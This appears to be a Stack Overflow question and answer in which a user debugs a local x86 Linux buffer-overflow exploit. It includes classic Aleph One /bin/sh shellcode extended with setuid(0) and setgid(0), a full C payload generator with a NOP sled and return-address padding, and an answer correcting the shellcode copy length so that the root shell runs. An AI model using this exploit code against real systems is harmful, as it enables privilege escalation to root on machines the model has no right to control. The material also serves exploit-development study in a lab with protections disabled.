# Why always get the message "Illegal Instruction (core dumped)"?

Tags: x86, linux, exploit, buffer-overflow

I tried to exploiting buffer overflow. In the exploit code
I use the `Aleph-One` shellcode.

```
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
```

Exploitation is normal, but I modified a little shellcode
In order to execute `setuid(0)` and `setgid(0)`, on exploit
I have changed the owner of the exploit into `root`.

```
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0)
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" // setgid(0)
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
```

When in execution, I get the message `Illegal Instruction (core dumped)`

**Note**:

1. I have disabled ASLR
2. The vulnerable and exploit programs are compiled using flag   `-fno-stack-protector -z execstack -mpreferred-stack-boundary=2`

Complete exploit code :

```
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

char *prog = "./bof4";
char shellcode[] = 
   //"\xeb\x0appssssffff"
   "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
   "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main (int argc, char **argv) {
    char buff[111];
    int i, j;
    int addr;

    if (argc > 1)
            sscanf(*(argv+1), "%x", &addr);
    else
            exit(0);
    for (i = 0; i < 35; i++) {
            *(buff+i) = 0x90;
    }
    for (j = 0; j < 45; j++, i++) {
            *(buff+i) = *(shellcode+j);
    }
    for (; i + 4 < 110; i += 4) {
            memcpy(buff+i, &addr, 4);
    }
    buff[108] = 0;
    fwrite(buff, strlen(buff), 1, stdout);
}
```

Can anyone explain ?

Answer (score 0, accepted):

Just by guessing as you has the core dump and could check that for sure.

Isn't your issue that the exploit was 45 bytes long and this is what you iterate in the second loop and now when you added more code (`setuid(0)` & `setgid(0)`) the loop just finishes in the middle?

Extend your second loop by 16 and check.

```
for (j = 0; j < 61; j++, i++) {
    *(buff+i) = *(shellcode+j);
}
```

Comment: Why I get `Segmentation fault (core dumped)` ? Do I have to change `35` bytes on the first loop ?

Comment: the first loop looks like nop-sled, I don't think it matters. If you have the dump can you check where it fails?

Comment: I do not have core file

Comment: set the `ulimit` and repeat. The core should be created